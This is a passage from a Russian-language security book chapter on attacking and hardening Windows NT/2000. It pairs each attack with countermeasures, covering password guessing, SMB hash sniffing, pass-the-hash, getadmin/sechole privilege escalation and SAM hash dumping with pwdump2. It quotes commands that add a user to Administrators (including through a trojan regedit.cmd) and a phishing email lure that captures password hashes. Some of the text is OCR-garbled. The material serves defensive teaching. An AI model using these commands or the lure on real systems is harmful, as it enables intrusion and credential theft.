Контрмеры: защита от подбора пароля Существует несколько защитных мер, которые могут сделать невозможными или. по крайней мере, затруднить попытки подбора пароля. Первая из них поможет в тех случаях, когда компьютер с системой NT. непосредственно подключенный к Internet, не должен отвечать на запросы о совместно используемых ресурсах Windows. Для этого нужно заблокировать доступ к портам TCP и UDP с номерами 135-139 на пограничном брандмауэре или маршрутизаторе, а также запретить привязку WINS Client (TCP/IP) для любого адаптера, подключенного к внешней сети, как показано на приведенной ниже иллюстрации.
В системе Windows 2000 для запрещения использования протокола NetBIOS поверх TCP/IP для каждого адаптера в отдельности можно использовать спе.{и-:;ль ный пользовательский интерфейс. Однако, как вы увидите из главы 6, такая возможность вовсе не является панацеей, и отключение адаптеров от совместно используемых файлов и принтеров является гораздо лучшим способом. Если ваши компьютеры с системой NT выполняют роль файловых серверов и, как следствие, должны обеспечивать возможность подключения, данных мер, естественно, будет недостаточно, поскольку они будут блокировать или даже запрещать все подобные службы. В таких случаях необходимо применять более традиционные меры: блокировать учетные записи после определенного количества неудачных попыток регистрации, реализовать политику строгого выбора паролей, а также регистрировать все неудачные попытки регистрации. К счастью, для выполнения этих задач компания Microsoft предоставляет все необходимые средства. Политика учетных записей Одним из таких средств является утилита User Manager. Для задания политики учетных записей выберите в диалоговом окне диспетчера пользователей команду Policies>Account. В появившемся диалоговом окне можно задать определенную политику назначения паролей, например установить ограничение на минимальную длину пароля или потребовать, чтобы пароли не повторялись чаще определенного количества раз. Кроме того, в диалоговом окне Account Policy можно установить блокировку соответствующей учетной записи после заданного количества неудачных попыток регистрации. Диспетчер пользователей также позволяет администраторам принудительно отключать пользователей после завершения установленной длительности сеанса. Это очень удобная возможность, позволяющая "перекрыть кислород" непрошеным ночным гостям. Подчеркнем еще раз, что каждый, кто намеревается попробовать "на прочность" пароли как с помощью описанных в данной главе методов ручного, так и автоматического подбора, должен помнить о возможностях блокировки учетных записей. Passfilt Еще больший уровень защиты можно обеспечить с помощью динамически подключаемой библиотеки Passfilt, входящей в состав Service Pack 2. Для того чтобы она была подключена к системе защиты, необходимо проделать процедуру, описанную в статье Q161990 базы знаний Microsoft Knowledge Base. Данная библиотека позволяет поддерживать жесткую политику выбора паролей, которая гарантирует защиту не только от взлома, но и от ленивого пользователя, выбирающего слишком простой пароль. После установки библиотеки Passfilt все пароли должны состоять не менее чем из шести символов, не могут совпадать с именами учетных записей или быть частью полного имени пользователя, а также должны состоять из символов, которые выбираются как минимум из трех следующих групп.
Библиотека Passfilt должна быть под рукой у каждого серьезного администратора NT, однако нужно отметить два ее ограничения. Первое состоит в жесткой установке минимальной длины пароля в 6 символов. Мы рекомендуем наложить более строгое ограничение в 7 символов в диалоговом окне Account Policy диспетчера пользователей. (Почему так важна разница в один символ, вы узнаете ниже при рассмотрении процесса взлома пароля NT.) Во-вторых, библиотека Passfilt вызывается лишь в том случае, когда решение об изменении пароля принимает сам пользователь. Если же пароль меняется администратором с помощью диспетчера пользователей, то выполнение требований Passfilt не гарантируется (см. статью Q174075). Для того чтобы обеспечить более строгое следование принятой политике учетных записей, можно разработать свою собственную библиотеку Passfilt. Учтите, что при таком подходе в качестве библиотеки Passfilt можно легко "получить в подарок" "троянского коня". Так что при выборе библиотек от сторонних производителей будьте очень внимательны. Библиотека Passfilt в системе Win 2000 устанавливается по умолчанию, однако остается неактивной. Для того чтобы ее активизировать, воспользуйтесь консолью secpol.msc или gpedit.msc и активизируйте режим Passwords must meet complexity requirements, относящийся к элементу консоли Security Configuration and Analysis\Account Policies\Password Policy.
Passprop Еще одним важным дополнительным средством, которое входит в состав NT Resource Kit (NTRK) является утилита Passprop, которая позволяет применить к учетным записям домена NT два следующих требования.
Для того чтобы наложить на систему безопасности оба требования, необходимо установить пакет NTRK (или просто скопировать файл passprop.exe, если установка всего пакета NTRK связана с вопросами защиты) и ввести следующую команду в командной строке: passprop /complex /adminlockout Аудит и регистрация событий Даже если никому и не удастся проникнуть в вашу сеть с помощью подбора пароля, так как вы установили библиотеку Passfilt или воспользовались утилитой Passprop, все равно имеет смысл отслеживать все неудачные попытки регистрации. Для этого выберите команду Policies>Audit в диалоговом окне диспетчера пользователей. При этом на экране появится диалоговое окно Audit Policy, представленное ниже.
Если для управления журналами и их анализа вам требуется надежная утилита командной строки, позволяющая автоматизировать ее использование, обратите внимание на утилиту dumpel из пакета NTRK, NTLast компании NTObjectives (по адресу http://www.ntobjectives.com можно найти как бесплатно распространяемую, так и коммерческую версию) или DumpEvt от компании Somarsoft (бесплатную версию утилиты можно найти по адресу http://www.somarsoft.com). Выявление вторжений в реальном времени После применения средств анализа журналов следующим этапом является реализация механизма оповещения о возможных нарушениях в реальном времени. Количество программных продуктов из так называемой категории систем выявления вторжений быстро возрастает, особенно для использования на платформе NT. Системы выявления вторжений, предназначенные для использования на компьютерах под управлением системы NT, представлены в табл. 5.2. Таблица 5.2. Некоторые системы выявления вторжений для систем NT/2000
К сожалению, обсуждение вопросов, связанных с выявлением вторжений, выходит за рамки данной кн7иги. Можем лишь подчеркнуть, что администраторы сети, обеспокоенные вопросами обеспечения безопасности, должны уделять этой технологии самое пристальное внимание — что может быть важнее, чем вовремя поступивший сигнал о возникшей в сети проблеме? Более подробная информация о выявлении вторжений, в том числе и сравнительные характеристики лучших программных продуктов этой категории, в настоящее время содержится в статье http://www.infoworld.com/cgi-bin/displayTC.pl7980504comp.htm. Перехват паролей, передаваемых по сети Утилита l0phtcrack предназначена для подбора паролей NT, которая обычно используется для автономного взлома перехваченной базы данных паролей, т.е. без соединения с сервером. Такой подход позволяет, во-первых, не беспокоиться о возможной блокировке учетных записей при попытках подбора пароля, а во-вторых, организовать перебор сколь угодно большого количества вариантов. Получение файла паролей - довольно нетривиальная задача, поэтому этот вопрос, а также методы использования утилиты l0phtcrack более подробно будут рассмотрены в разделе "Взлом Паролей Nt".
"Отправьте выбранной жертве почтовое сообщение (неважно, на личный адрес или же на общий адрес компании). В текст письма включите адрес URL в форме file:////ваш_компьютер/имя_совместно_ используемого_ресурса/сообщение.html. Как только получатель щелкнет на этом URL, его хэшированный пароль сразу же будет отправлен вам для аутентификации." При знакомстве с технологиями, подобными протоколу ARP (см. главу 10), вы увидите, что коммутируемые сети на самом деле не обеспечивают надежную защиту против перехвата паролей. Мастаки из LOpht даже умудрились смастерить утилиту, которая выуживает хэши-рованные пароли NT из потока данных, которыми обмениваются компьютеры при регистрации с использованием протокола РРТР (Point-to-Point Tunneling Protocol). В системе NT адаптированный вариант РРТР используется для организации частных виртуальных сетей (VPN — Virtual Private Network). Эта технология позволяет организовывать туннелирование потока данных для передачи информации по Internet с гарантированной защитой. По адресу http://www.l0pht.com/10phtcrack/donwload.html можно найти два анализатора сетевых пакетов: одна программа предназначена для работы в системе Solaris 2.4+ (написана L0pht), а вторая (ее автор — модератор бюллетеня Bugtrag, хакер Aleph One (Алеф Ван)) — в любой сети UNIX, в которой имеется библиотека перехвата пакетов libpcap. Кроме того, на этой же Web-странице имеется версия программы readsmb для UNIX, написанная Йоше Чангом (Jose Chung) из компании Basement Research. Передача хэш-кода Пол Эштон (Paul Ashton) выдвинул идею модификации SMB-клиента сервера Samba системы UNIX, обеспечивающего совместный доступ к файлам (http://www.saniba.org) с целью реализации описанного выше приема. Исходный документ Пола можно найти в архивах бюллетеня NT Bugtraq по адресу http://www.ntbugtraq.com. Новые версии программы smbclient для системы UNIX позволяют зарегистрироваться на клиентских системах NT с использованием лишь хэш-кода.
Контрмеры: запрещение аутентификации в локальной сети В сервисном пакете Service Pack 4.0 была добавлена поддержка нового параметра системного реестра, призванного запретить узлу NT выполнять аутентификацию в локальной сети (с использованием хэш-кодов LM). Для того чтобы воспользоваться этой возможностью, нужно добавить параметр LMCompatibilityLevel со значением REG_DWCRD=4 к следующему ключу системного реестра. HKEY_LOCAL_MACHINE\System\CurrentControlSet\LSA До появления сервисного пакета SP4 не было возможности запретить обработку хэш-кодов LМ на узле NT, используемых для аутентификации. Как следствие, такие узлы абсолютно не защищены от опасности перехвата SMB-пакетов. С выходом новой операционной системы Win 2000 компания Microsoft предоставила другую возможность передачи регистрационных данных по локальной сети клиентами Win Эх. Ее предоставляет клиент службы каталогов (DSClient — Directory Services Client), который можно найти на установочном компакт-диске системы Windows 2000 в папке Clients\win9x (файл Dsclient.exe). Теоретически пользователи Win 9x могут установить специальные параметры системного реестра и использовать более надежную защиту благодаря использованию хэш-кодов NT. В статье Q239869 описывается, как установить программу DSClient и настроить клиентов Win 9л: для использования протокола идентификации NTLM версии 2. Использование подписи SМВ Хотя полностью защититься от атак с использованием хэш-кодов нельзя, можно наложить некоторые ограничения на удаленную регистрацию в системе Windows с помощью подписи SMB (SMB signing). Такая возможность появится в системе NT, если на ней установить сервисный пакет SP3 или более поздний. Здесь мы упоминаем этот механизм исключительно для обеспечения полноты изложения. При использовании подписи SMB каждый пакет 8MB, передаваемый правильно настроенными клиентами и серверами NT, будет проверяться с применением криптографических методов. Это позволит предотвратить вставку в поток данных регистрации пакетов взломщика. Как и ранее, это решение годится только для Windows NT, так как клиенты Win 9x не поддерживают описанный выше механизм. Кроме того, как отмечается в статье Q161372 базы знаний Microsoft, посвященной режиму использования подписи SMB, активизация этого средства влечет за собой снижение производительности на 10-15 %. |
Удаленное проникновение: состояние DoS и переполнение буфера В этом разделе мы немного поговорим о том, как может разворачиваться ситуация в том случае, если взломщику не удастся подобрать пароль к интересующей его системе. В таких случаях у него есть несколько возможностей. Первая из них состоит в поиске скрытого недостатка архитектуры NT, которым можно было бы воспользоваться для удаленного проникновения и получения доступа к системе. Вторая заключается в генерации состояния DoS (DoS — отказ в обслуживании), — последней надежды неудачливого взломщика. Удаленное переполнение буфера О Windows NT ходят легенды, что в ней существуют многочисленные секретные "лазейки", с помощью которых можно получить статус администратора любой удаленной системы. На самом деле в настоящее время известно лишь несколько подобных недостатков, которые при определенных условиях могут дать подобный эффект, однако все они относятся к приложениям, а не к самой системе Windows NT. Чем это объясняется, то ли относительной "молодостью" NT, то ли архитектурой, заложенной в нее разработчиками Microsoft, — это спорный вопрос. Таблица 5.3. Некоторые публикации о выявленных ошибках переполнения буфера Windows
Контрмеры: защита от переполнения буфера Лучшим ответом на атаки с применением переполнения буфера является профессиональное программирование. Упоминавшиеся выше статьи предоставляют опытному программисту некоторые идеи, реализация которых позволит избежать подобной угрозы при написании приложений (при их изучении пригодится знание языка С и низкоуровневого языка программирования Assembler). Однако поскольку создание программных продуктов, подобных системе Windows, выполняется практически без непосредственного участия пользователей, то ответственность за устранение выявленных проблем должна ложиться на плечи группы разработчиков.
Замещение системных динамически подключаемых библиотек для предотвращения переполнения буфера является несколько кардинальным, однако все же такой подход, очевидно, достоин внимания. Отказ в обслуживании (DoS) Атаки, приводившие к генерации состояния DoS, были чрезвычайно популярны в 1997-1998 годах, что объясняется появлением многочисленных утилит, предназначенных для повреждения стека TCP/IP на самых различных платформах. Некоторые из них были направлены исключительно на систему Windows. Мы не будем тратить время на описание всех используемых при этом недостатков реализации стека протоколов TCP/IP, поскольку все они уже устранены в пакетах обновления. Кроме того, обсуждению атак DoS посвящена целая глава (см. главу 11, а также часть главы 4, где были рассмотрены методы предотвращения подобных угроз для платформы Win 9х). Контрмеры: предотвращение состояния DоS Установка самого последнего сервисного пакета (при написании книги — версии 6А) позволяет защитить систему NT от большинства известных способов генерации состояния DoS. Кроме того, следите также за появлением промежуточных пакетов обновления, особенно, если они относятся непосредственно к стеку протоколов TCP/IP систем NT/2000, tcpip.sys. (Естественно, обновление используемой операционной системы до Win 2000 позволяет достигнуть того же результата.) Многие серьезные атаки DoS, связанные с применением средств land, newtear и ООВ, стали недоступными после установки промежуточных пакетов обновления, появившихся после SP3. Конечно, обновление до Win 2000 представляет собой самый лучший сервисный пакет, в котором нашли отражение все выпущенные ранее пакеты обновления. Для получения более подробной информации о ключах системного реестра, с помощью которых от атак DoS можно защитить серверы Internet под управлением Windows, читайте главу 6. Мы рекомендуем познакомиться также с другими программными продуктами, направленными на предотвращение атак DoS на стек TCP/IP, таких как teardrop, land, OOB и т.д. Они подробно рассматриваются в главе 12. Расширение привилегий Предположим, что попытка подбора пароля увенчалась успехом — в ваших руках регистрационное имя и связанный с ним пароль пользователя интересующего вас сервера NT, не имеющего прав администратора. В мире NT шаг, заключающийся в получении доступа к системе в качестве одного из ее пользователей, несмотря на всю его сложность, является сравнительно простым. Последующие шаги потребуют гораздо больших знаний, изобретательности и везения. Так, например, существуют средства, позволяющие расширить полномочия, соответствующие пользовательской учетной записи. Однако, как уже отмечалось, этим средствами нельзя воспользоваться, обладая правами лишь обычного пользователя NT, так как такой пользователь по умолчанию не имеет права интерактивной регистрации. Однако если системный администратор допустил несколько серьезных промахов, с помощью этих средств взломщик сможет расширить свои полномочия. Сбор информации Если взломщику удалось завладеть учетной записью пользователя, не обладающего правами администратора, то единственной реальной возможностью, которой ему осталось воспользоваться, является дальнейший сбор информации, которая позволит расширить привилегии. В процессе сбора таких данных используются многие методы инвентаризации, которые уже упоминались в главе 3. Анализируя все полученные сведения, взломщик может получить доступ к критичным ресурсам. Вот некоторые из средств и приемов для сбора важных данных.
Этот процесс высасывания (hoovering) информации из всех "закоулков" получил свое определение в английском языке по названию производителя популярных пылесосов. Контрмеры: защита от сбора информации Для проверки степени защищенности системы от деятельности подобного рода лучше всего попробовать выполнить описанные действия самостоятельно. Для этого зарегистрируйтесь на удаленном компьютере под именем обычного пользователя и проверьте, удастся ли такому пользователю выполнить описанные выше операции. Автоматизировать процесс поиска можно с использованием команд find и findstr системы NT. Утилита getadmin getadmin — это небольшая программа, написанная Константином Соболевым (Konstantin Sobolev), которая добавляет пользователя в локальную группу Administrators. Она использует низкоуровневую процедуру ядра NT для установки глобального флага, позволяющего получить доступ к любому запущенному процессу, а затем с помощью приема, называемого внедрение в DLL (DLL injection), вставить специальный исполняемый код в какой-нибудь процесс, который обладает привилегией добавления пользователей в группу Administrators. (Как правило, в качестве такого процесса выбирается winlogon, который использует учетную запись System). Более подробная информация об утилите getadmin и ее исполняемый код можно найти по адресу http://www.ntsecurity.net/security/getadmin.htm. Контрмеры: защита от использования ynunnugetadmin Изъян, на котором основывается принцип работы утилиты getadmin, исправлен в дополнительном модуле обновления к сервисному пакету SP 3. Этот модуль входит также во все впоследствии выпущенные сервисные пакеты. Согласно некоторым источникам, модернизированная версия утилиты getadmin, названная crash4, способна обойти исправления, если она будет запушена перед getadmin. Однако нет каких-либо подтверждений, что этот прием является работоспособным. Утилита sechole Утилита sechole предоставляет те же возможности, что и getadmin: она добаштяет текущего пользователя в локальную группу администраторов. Обновленная версия этой утилиты secholed помещает пользователя в группу администраторов домена.) Однако для выполнения тех же действий, что и getadmin, эта утилита использует другие механизмы. Как отмечают Прасад Дабак (Prasad Dabak), Сандип Фадк (Sandeep Phadke) и Милинд Бора (Milind Borate), sechole модифицирует в оперативной памяти код вызова процедуры OpenProcess, и это позволяет ей успешно подключаться к привилегированному процессу, независимо от того, имеет ли она для этого соответствующие разрешения. После успешного подключения она работает так же, как и утилита getadmin, выполняя код внутри процесса-носителя, и добавляет текущего пользователя в указанную группу Administrators. Полный код и подробное описание можно найти на Web-узле NT Security по адресу http://www.ntsecurity.net/security/sechole.htm. Удаленный запуск утилиты sechole Рассмотрим пример применения основного подхода, используемого при нападении на Web-серверы, который в различных формах применяется в Internet. Успешность такой атаки зависит от того, существует ли каталог US-сервера, доступный для записи и запуска программ. К счастью, компания Microsoft "предоставила" много каталогов с такими разрешениями, используемыми по умолчанию. Таблица 5.4. Виртуальные каталоги сервера US, имеющие по умолчанию разрешения Execute, к соответствующие им физические каталоги
Однако не будем торопиться. Выше уже упоминалось, что утилита sechole добавляет пользователя в локальную или доменную группу администраторов. Если же она была запущена посредством Web-броузера, то в группу администраторов будет добавлена учетная запись 1изп_имя_машины. А это не очень хорошо, поскольку этой учетной записи назначается случайный пароль, который взломщику придется подбирать при удаленной регистрации. Как же в группе администраторов создать новую учетную запись пользователя с паролем, который выбрал сам взломщик? Это просто осуществить с помощью встроенной команды net localgroup. Создайте простой командный файл (например, с именем adduser.bat) со следующей строкой:
Далее вместо того чтобы регистрироваться с использованием учетной записи IUSR, пароль которой пока неизвестен, взломщик добавит нового пользователя с помощью файла сценария adduser.bat, запущенного в броузере с использованием следующего сложного адреса URL. Контрмеры: защита от применения утилиты sесhо1е Существует два простых метода защиты как от утилиты sechole, так и от удаленного выполнения команд в Web. Во-первых, установите самый последний сервисный пакет (6А или более новый). Для систем, на которых установлен сервисный пакет SP5, можно воспользоваться модулем обновления. Более подробную информацию можно получить в статье KB Q190288. Затем, независимо от того, волнует ли вас проблема sechole или нет, запретите доступ для записи в каталоги сервера Internet, в которых содержатся исполняемые файлы (см. табл. 5.4). Для этого проще всего заблокировать доступ к портам TCP и UDP сервера с номерами 135-139 и, таким образом, исключить доступ к совместно используемым ресурсам Windows. Если доступ с использованием протокола SMB заблокирован, обязательно убедитесь в том, отключен также доступ на запись по протоколу FTP.
После щелчка на кнопке Edit Properties на экране появится диалоговое окно, показанное на следующем рисунке.
Менее известный способ расширения привилегий, обеспечиваемый утилитой besysadm, появился после выпуска сервисного пакета Service Pack 5. Информацию о соответствующем модуле обновления можно найти по адресу http://www. microsoft.cam/technet/eecurity/bullatin/ms99-006.asp
Ложные запросы к портам LPC Такую возможность обнаружила группа исследователей RAZOR (http://razor. bindview.com) и предоставила авторам проверочный код, который, однако, не был открыт для широкого использования. В приведенном коде иллюстрируется изъян одной из функций интерфейса с портами LPC (Local Procedure Call — локальный вызов процедур), который позволяет потокам и процессам на локальном узле взаимодействовать друг с другом. Обычно порты LPC обеспечивают интерфейс между потоком сервера и клиентными потоками, которые генерируют запросы на использование служб. Кроме того, порты LPC выполняют проверку легитимности клиента. Однако взломщик, у которого имеется возможность создать оба потока, и сервера и клиента. может обойти такую проверку и связать клиентный поток с любым пользователем, даже имеющим привилегии SYSTEM. С:\>whoami Кроме того, удостоверимся в том, что пользователь Mallory не может добавить себя п группу администраторов самостоятельно. C:\>net looalgroup administrators mallory /add Теперь воспользуемся командой net use совместно с утилитой hk. C:\>hk net localgroup administrators mallory /add Теперь Мэлори (Mallory) принадлежит к группе администраторов, как видно из приведенного листинга. C:\>net localgroup administrators
Применяйте модули обновления! Компания Microsoft выпустила модуль обновления сервисного пакета SP6A, который изменяет вызов функции проверки достоверности, входящей в состав программного интерфейса с портами LPC. Этот модуль обновления можно найти в бюллетене MS00-003 компании Microsoft по адресу http://www.microsoft.com/technet/security/bulletin/ms00-003.asp. "Троянские кони" и параметры реестра Основной принцип расширения привилегий заключается в том, чтобы ввести в заблуждение других пользователей (лучше всего администратора) и выполнить код, который позволит учетной записи взломщика получить привилегии суперпользователя. Аналогичный подход состоит во внедрении какого-либо кода, который будет выполнен при наступлении некоторого обычного события в системе (например, в процессе перезагрузки). Обе из этих стратегий, а также методы борьбы с ними, обсуждаются ниже. Многие из описанных ниже методов гораздо глубже и полнее освещаются на страницах прекрасного Web-узла Security Bugware, которые можно найти по адресу http://Oliver.efri.hr/-crv/security/bugs/NT/getadmt#].html, где # — числа от 2 до 7.
"Троянские кони" и расширение привилегий "Троянский конь" (Trojan horse) — это программа, которая предоставляет некоторые полезные функции, однако на самом деле предназначена для скрытного выполнения злонамеренных или разрушительных действий (для получения более подробной информации читайте главу 14). От одной только мысли о возможностях, открывающихся при переименовании стандартных утилит NT, голова идет кругом! Например, вместо программы regedit.exe взломщик может поместить в каталог winnt\system32 командный файл regedit.cmd. Когда ничего не подозревающий администратор введет в командной строке regedit, чтобы выполнить какие-то операции с системным реестром, будет запущен командный файл. Обычно с его помощью выполняется тот или иной вариант следующей команды. net localgroup administrators <пользователь> /add Контрмеры: защита от "троянских коней" Хотя предлагаемые контрмеры и не обеспечивают стопроцентной защиты, все же будьте внимательны при запуске приложений. Обращайте внимание на различные аномалии (например, быстро промелькнувшее окно командной строки в момент вызова полноценной программы Windows). Подсистема защиты файлов системы Win 2000 (WFP — Windows File Protection) обеспечивает хранение резервных копий около шестисот важных файлов в каталоге %windir% и предотвращает их от перезаписи. Поскольку "троянских коней" очень трудно обнаружить (особенно те из них, которые выполняют модификацию самого ядра NT), стоит поддерживать максимальные меры предосторожности. А именно, создавайте резервные копии своих данных, переустанавливайте операционную систему и все приложения только с проверенных носителей информации. Некоторые из наиболее коварных "троянских коней", называемых наборами rootkit, будут рассмотрены ниже в данной главе. Параметры реестра, обеспечивающие выполнение программ Еще одним хорошим методом скрытого запуска командного файла является использование специальных значений в системном реестре NT. В зависимости от разрешений пользователя, под именем которого взломщик проник в систему, ему могут быть доступны некоторые из таких параметров системного реестра. Помните, что удаленный доступ к системному реестру могут получить только администраторы, а на консоли сервера могут зарегистрироваться лишь несколько пользователей из встроенных учетных записей NT. Поэтому вероятность того, что взломщику удастся воспользоваться описанным здесь способом, очень мала. Ему повезет только в том случае, когда используемая им учетная запись входит в группу Server Operators. В табл. 5.5 перечислены некоторые параметры системного реестра и разрешения, установленные для них по умолчанию, которыми могут воспользоваться взломщики для запуска программ. Таблица 5.5. Параметры системного реестра, которые можно использовать для вызова программ, расширяющих привилегии пользователя
Защита параметров системного реестра С использованием редактора системного реестра regedt32 для этих параметров необходимо задать следующие разрешения.
Подобная настройка может повлиять на работоспособность некоторых приложений. Поэтому сначала удостоверьтесь, что внесенные изменения не отразились на функциональности системы. Кроме того, не забывайте о том, что описанные выше параметры системного реестра зачастую используются для скрытого запуска приложений во время загрузки, о чем более подробно вы узнаете ниже в данной главе. Несколько заключительных слов о расширении привилегий Теперь у вас не вызывает сомнений тот факт, что расширить привилегии чрезвычайно сложно. Единственное, что может помочь взломщику, — это грубые ошибки в настройке системы или же получение доступа к учетной записи, которая и так обладает достаточно высокими привилегиями (например, является членом группы Server Operators). Далее мы рассмотрим самый худший (с точки зрения безопасности) сценарий -— взломщик получил доступ к системе на уровне администратора. |
Расширение привилегий У вас может возникнуть вопрос: "Стоит ли читать, что может произойти, когда кто-то получит права администратора на моем компьютере? И так все ясно!" Не спешите с выводами — отформатировать жесткий диск и переустановить систему с установочных дисков вы всегда успеете. Гораздо важнее попытаться установить, какие ресурсы были использованы взломщиком и как далеко ему удалось продвинуться. Взломщик мог назначить привилегии администратора локальной системы какому-нибудь пользователю, не имеющему практически никаких прав для доступа к другим компьютерам сети. Поэтому ему, скорее всего, понадобится установить в сети дополнительные средства, с помощью которых он мог бы расширить свои полномочия. Выявить взломщика на этом этапе и остановить его проникновение не только возможно, но и жизненно необходимо. В данном разделе вы найдете подробное описание некоторых основных средств и методов, используемых в этой чрезвычайно важном "финальном поединке" взломщика и системного администратора. Взлом базы данных SAM Получив привилегии администратора, взломщик, скорее всего, сразу же направится к диспетчеру SAM системы NT (SAM — Security Accounts Manager). В базе данных SAM содержатся имена и зашифрованные пароли всех пользователей локального узла или домена, если взламываемая система является контроллером. Поэтому данные SAM — наиболее вожделенная цель для нанесения завершающего удара, подобная файлу /etc/passwd из мира UNIX. Даже если база данных SAM получена с автономной станции NT, существует шанс получения с ее помощью доступа к контроллеру домена. Таким образом, взлом диспетчера SAM — это один из наиболее мощных методов расширения привилегий и использования доверительных отношений. Получение базы данных SAM При осуществлении любых попыток взлома первый этап состоит в получении файла паролей, который в случае NT называется файлом данных SAM. Перезагрузка с помощью альтернативной операционной системы Для того чтобы перезагрузиться с использованием другой операционной системы, достаточно подготовить системную дискету с DOS. Если на жестком диске интересующего вас компьютера установлена файловая система NTFS, то на эту дискету необходимо поместить соответствующий драйвер NTFS, называемый NTFSDOS, от компании Systems Internals (http://www.sysinternals.com/). С помощью этого драйвера все разделы NTFS будут смонтированы в качестве логических дисков DOS, после чего не останется никаких препятствий для копирования файла SAM. Извлечение резервной копии файла SАМ из каталога Repair При каждом запуске утилиты NT Repair Disk Utility (rdisk) с параметром /s, который активизирует режим резервного копирования важной системной информации, создается сжатая версия базы данных SAM, которая помещается в каталог %systemroot%\repair под именем Sam._. После завершения копирования важных данных на аварийную дискету многие системные администраторы не утруждают себя задачей удаления этого файла. С:\>expand sam._sam
Извлечение хэш-кодов из данных SAM При наличии привилегий администратора кэш-коды паролей можно легко получить непосредственно из системного реестра в формате, подобном формату файла /etc/passwd UNIX. Для этого можно воспользоваться утилитой pwdump, написанной Джереми Аллисоном (Jeremy Allison). Исходный код этой утилиты и ее откомпилированные версии для Windows можно найти в архивах Internet. Новые версии утилиты LOphtcrack также имеют подобное встроенное средство. Однако ни pwdump, ни LOphtcrack не способны преодолеть расширенное шифрование файла SAM с использованием ключа SYSKEY, появившееся после выпуска сервисного пакета Service Pack 2 (для получения более подробной информации читайте раздел "Контрмеры: Защита От Взлома Пароля" ниже в этой главе). Тодд Сабин написал обновленную версию утилиты pwdump2, после установки которой идентификатор РЮ процесса LSASS можно получить автоматически. Поэтому пользователям обновленной версии выполнять этот шаг вручную не требуется. Однако сейчас мы сосредоточимся на обсуждении основной концепции получения идентификаторов процессов, которую потребуется использовать в тех случаях, когда обновленная версия утилиты pwdump2 отсутствует. Воспользуемся утилитой pulist из NTRK и, объединив ее с утилитой find, получим идентификатор процесса lsass.exe, как показано в следующем примере. D:\>pulist | find "lsass" Теперь можно запустить утилиту pwdump2, передав ей в качестве параметра полученный идентификатор PID 50. По умолчанию результаты выводятся на экран (в приведенном выше примере они показаны в сокращенной форме), однако их легко перенаправить в файл. Пом- D:\>pwdump2 50 Из данного примера видно, что выводятся такие поля, как имя пользователя, относительный идентификатор RID (см. главу 3), хэш-код LanMan и кэш-код NT I последний выведен только частично). Все поля отделяются друг от друга двоеточием. Направив вывод в файл, можно получить готовые исходные данные для многих средств взлома паролей системы NT. Самая последняя версия утилиты pwdump2 позволяет также извлекать хэш-коды из базы данных активного каталога.
Перехват данных о пользовательских именах и паролях, передаваемых по сети Одной из сильных сторон утилиты LOphtcrack является возможность извлекать \эш-коды паролей прямо из SMB-пакетов, передаваемых по сети. Этот подход уже рассматривался в одном из предыдущих разделов, посвященных подбору паролей. Взлом паролей NT В данном разделе вы познакомитесь с тремя утилитами, предназначенными для взлома паролей системы NT. Хотя наиболее известной является утилита L0phtcrack, здесь мы рассмотрим и некоторые другие средства. L0phtcrack Версию утилиты L0phtcrack с графическим интерфейсом, распространяемую исследовательской лабораторией компании ©stake по цене S100, можно найти по адресу http://www.atstake.com. Для сохранения душевного покоя системного администратора это совсем недорого. Во время написания этой книги была выпущена бета-версия 3 утилиты L0phtcrack — первое существенное обновление программы за последние два года. Текущее состояние процесса подбора пароля можно в любой момент сохранить в файле с расширением .1с. Поэтому работа утилиты L0phtcrack может быть безболезненно прекращена, а затем возобновлена с того же места с помощью команды File>Open Password File.
John-потрошитель John — это программа взлома паролей с использованием словаря. Ее можно получить по адресу http://www.false.com. Первоначально эта утилита командной строки была создана для взлома файлов паролей системы UNIX, а теперь ее можно использовать для подбора хэш-кодов LanMan системы Windows NT. Помимо того, что John совместима с несколькими платформами и позволяет применять несколько разных алгоритмов шифрования, эта утилита отличается также высокой скоростью работы и тем, что распространяется бесплатно. С другой стороны, ее широкие возможности и, соответственно, большой набор параметров командной строки, делают эту утилиту более сложной в освоении, чем L0phtcrack. Кроме того, поскольку утилита John может взламывать лишь пароли LanMan, то полученные результаты необходимо проверять на соответствие прописных и строчных букв (пароли LanMan всегда переводятся в верхний регистр, тогда как в паролях NT используются как прописные, так и строчные буквы). Crack 5 с расширением для NT Утилита crack, написанная Алеком Маффетом (Alec Muffet), изначально предназначалась для взлома файлов паролей системы UNIX. Однако со временем для нее было создано расширение, которое позволило использовать эту утилиту и для взлома паролей NT (http://www.sun.rhbnc.ac.uk/~phacl07/c50a-nt-0.20.tgz). Самое большое преимущество использования утилиты crack состоит в очень широком разнообразии проверяемых ею вариаций возможных паролей (включая более 200 вариантов, основанных на имени пользователя). Однако все преимущества утилиты crack будут сведены на нет, если у вас отсутствует опыт работы в системе UNIX, необходимый для ее установки и запуска. Контрмеры: защита от взлома пароля
Строгие правила выбора пароля Никакие технические средства не смогут обеспечить гарантированную защиту от взлома пароля. Они необходимы для создания эффективной защиты, но одних лишь технических средств недостаточно. Самым эффективным и вместе с тем трудно реализуемым средством был и остается правильный выбор пароля. Пользователи, выбирающие легко угадываемые пароли или записывающие их на обратной стороне клавиатуры, по-видимому, еще долго будут оставаться источником головной боли администраторов. Надеемся, что приведенное ниже описание некоторых скрытых недостатков, имеющихся в алгоритмах защиты паролей NT, сможет помочь вам в разъяснении пользователям необходимости строгого соблюдения ваших требований.
Данный пример наглядно демонстрирует, как относительно просто угадать казалось бы довольно сложный пароль LMH, зная его вторую половину. Таким образом, мы получаем парадокс: при данном подходе 12- и 13-символьные пароли могут оказаться менее надежными, чем 7-символьные, так как взломщик, зная вторую половину длинного пароля, может догадаться о том, из каких символов состоит первая половина, как это было показано в рассмотренном примере. Пароль, состоящий из восьми символов, вряд ли даст взломщику много информации, однако он, пусть только теоретически, не столь надежен, как 7-символьный пароль. Защита базы данных SAM Ограничение доступа к файлу SAM — это также один из важнейших методов зашиты. Физическое ограничение доступа к серверу является единственным методом воспрепятствовать злоумышленнику скопировать файл SAM, загрузившись с дискеты, или скопировать резервную копию этого файла из папки Repair. Надеемся, что о том, чтобы контролировать все случаи регистрации на сервере под именем Administrator, напоминать не нужно. Шифрование SYSKEY Расширенное SYSKEY-шифрование данных SAM было разработано вскоре после выхода сервисного пакета Service Pack 2. Такой алгоритм позволяет установить шифрование паролей с помощью 128-битового ключа (по умолчанию используется 40-битовый ключ). Для включения режима шифрования необходимо выбрать команду Starts Run и ввести в поле ввода появившегося диалогового окна Run команду syskey. Режим шифрования SYSKEY можно настроить с использованием нескольких основных параметров, как показано на следующих двух рисунках. При включении режима SYSKEY ключ шифрования паролей, в свою очередь, кодируется с помощью системного ключа, который может храниться как локально (защищенный 